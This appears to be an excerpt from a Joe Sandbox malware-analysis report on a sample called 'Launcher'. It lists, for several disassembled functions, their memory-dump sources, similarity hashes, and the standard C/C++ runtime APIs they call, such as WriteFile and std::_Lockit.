                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ___except_validate_context_record
                                                                                                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                                                                                                            • API String ID: 3493665558-3733052814
                                                                                                                                                                                                                                                            • Opcode ID: d2932ded737fb47018123d2567679ec19fedd931e8d7e3a685f545aa22449c23
                                                                                                                                                                                                                                                            • Instruction ID: 205c5ce6aaf1343401e1eeb4ce300759bab46d88d2697cf03c765c046a1fcee5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d2932ded737fb47018123d2567679ec19fedd931e8d7e3a685f545aa22449c23
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D3106725802459BCF228F50D8629BA7B69FF09355B18C17BFC4E4A321D336CDA1DB91
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __alloca_probe_16__freea
                                                                                                                                                                                                                                                            • String ID: A2sx
                                                                                                                                                                                                                                                            • API String ID: 1635606685-2144273025
                                                                                                                                                                                                                                                            • Opcode ID: b5d6d249b9bcdabe6f019854c4fc2f77f1b4a39058bf8e683a7bbb1039e626a8
                                                                                                                                                                                                                                                            • Instruction ID: b99c4ca2a05769ebeb51383a93c8862f406189ee753ee1ff0369d9e0bf1416af
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b5d6d249b9bcdabe6f019854c4fc2f77f1b4a39058bf8e683a7bbb1039e626a8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2E21D37290519AABDF229FA7DC45EAF7BA8EF81720F144129F918AB291D730CD40C790
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,009E80FC,?,009D83F3,?,?,?,00000000), ref: 009E891A
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,009E80FC,?,009D83F3,?,?,?,00000000,?,?,?,?,?,009D8191,?,009D83F3), ref: 009E8940
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                            • String ID: A2sx
                                                                                                                                                                                                                                                            • API String ID: 442123175-2144273025
                                                                                                                                                                                                                                                            • Opcode ID: ebfa44e1f88f24cb41ff33b9abe02af23eae4794b0052d47d5d695ec04e0c48e
                                                                                                                                                                                                                                                            • Instruction ID: c82eb1e580bdbb85defdb4ce8955672cc63b98527b2d76f4b6dba393727919b8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ebfa44e1f88f24cb41ff33b9abe02af23eae4794b0052d47d5d695ec04e0c48e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26218031A00259DFCF25CF59DC819AAB3F9FF48314B5444AAE90DE7251DB309D81CB51
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 009C60DF
                                                                                                                                                                                                                                                              • Part of subcall function 009C4360: std::_Lockit::_Lockit.LIBCPMT ref: 009C438E
                                                                                                                                                                                                                                                              • Part of subcall function 009C4360: std::_Lockit::~_Lockit.LIBCPMT ref: 009C43B9
                                                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 009C61AB
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                            • String ID: A2sx
                                                                                                                                                                                                                                                            • API String ID: 593203224-2144273025
                                                                                                                                                                                                                                                            • Opcode ID: c7e7f4322be80b320cf5001a4ce21fb9e8ceffceb5f34b44fc5008adcc31c649
                                                                                                                                                                                                                                                            • Instruction ID: b5954a641d5ba377b3f153e836a98ea3b8dc5f8d6224014ccab49a61a652a8d0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c7e7f4322be80b320cf5001a4ce21fb9e8ceffceb5f34b44fc5008adcc31c649
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F31A7B5D142099FCF04EFA8D595AAEBBF0FF48301F10846EE856A7351E634AA44CF52
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 009C62AF
                                                                                                                                                                                                                                                              • Part of subcall function 009C4360: std::_Lockit::_Lockit.LIBCPMT ref: 009C438E
                                                                                                                                                                                                                                                              • Part of subcall function 009C4360: std::_Lockit::~_Lockit.LIBCPMT ref: 009C43B9
                                                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 009C637B
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                            • String ID: A2sx
                                                                                                                                                                                                                                                            • API String ID: 593203224-2144273025
                                                                                                                                                                                                                                                            • Opcode ID: 606cc6d20b088a3aecb3c524990460970bbbf06ea7ef607096214cfb71e6c122
                                                                                                                                                                                                                                                            • Instruction ID: 86fe4dbd04d343f1dc1decf8fe030cd0e10c976d3745a1a63e36ba3e73125932
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 606cc6d20b088a3aecb3c524990460970bbbf06ea7ef607096214cfb71e6c122
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A31B6B5D04249DBCB04EFA8D595AAEBBF0FF48300F40456EE856A7351EB34AA44CF52
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 009C3EAF
                                                                                                                                                                                                                                                              • Part of subcall function 009C4360: std::_Lockit::_Lockit.LIBCPMT ref: 009C438E
                                                                                                                                                                                                                                                              • Part of subcall function 009C4360: std::_Lockit::~_Lockit.LIBCPMT ref: 009C43B9
                                                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 009C3F7B
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                            • String ID: A2sx
                                                                                                                                                                                                                                                            • API String ID: 593203224-2144273025
                                                                                                                                                                                                                                                            • Opcode ID: ade4dc73413f353eda50b33d6ca1b7b60cc51e43c644192a370b5b9ee884dc79
                                                                                                                                                                                                                                                            • Instruction ID: d918aa4f29cd430001f1e60f38fc17f93c3faacef5b0ddcadbe72651e2f81415
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ade4dc73413f353eda50b33d6ca1b7b60cc51e43c644192a370b5b9ee884dc79
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6231DCB5D04209DBCB04EFA8D595AADBBF0FF48300F10846EE855A7351D7349A44CB52
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 009D3BC7
                                                                                                                                                                                                                                                            • ___raise_securityfailure.LIBCMT ref: 009D3CAF
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                                                                                                            • String ID: A2sx
                                                                                                                                                                                                                                                            • API String ID: 3761405300-2144273025
                                                                                                                                                                                                                                                            • Opcode ID: 5a54269728d937336288f1f23994418658f0157f8e24006aa1d193adfb6de2bf
                                                                                                                                                                                                                                                            • Instruction ID: 7c16c127273cf872d562e685f15098c5921f7b56fc9782bc55bc9d87a4cab34e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5a54269728d937336288f1f23994418658f0157f8e24006aa1d193adfb6de2bf
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DB21F5B45693049FE710EF14F949B703BE5FB48390F50842AE608CB3B0E3B45980EB56
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 009C438E
                                                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 009C43B9
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2331747535.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331723550.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331782458.00000000009F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331805084.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331825928.00000000009FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331847242.0000000000A01000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331867874.0000000000A04000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2331908784.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_Launcher.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                            • String ID: A2sx
                                                                                                                                                                                                                                                            • API String ID: 593203224-2144273025
                                                                                                                                                                                                                                                            • Opcode ID: a760884c07762f698fb8cc387928a11a54e554679a77468022e2399acaa89cf9
                                                                                                                                                                                                                                                            • Instruction ID: 49ae647b342b2138d9caf7cb17b34e8c6a1d7764db5f66944ca507d9248ed516
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a760884c07762f698fb8cc387928a11a54e554679a77468022e2399acaa89cf9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1001E871E44208DFCB04EFA8D951BADB7F4FF48304F8004A9E416AB391D7346A44DB52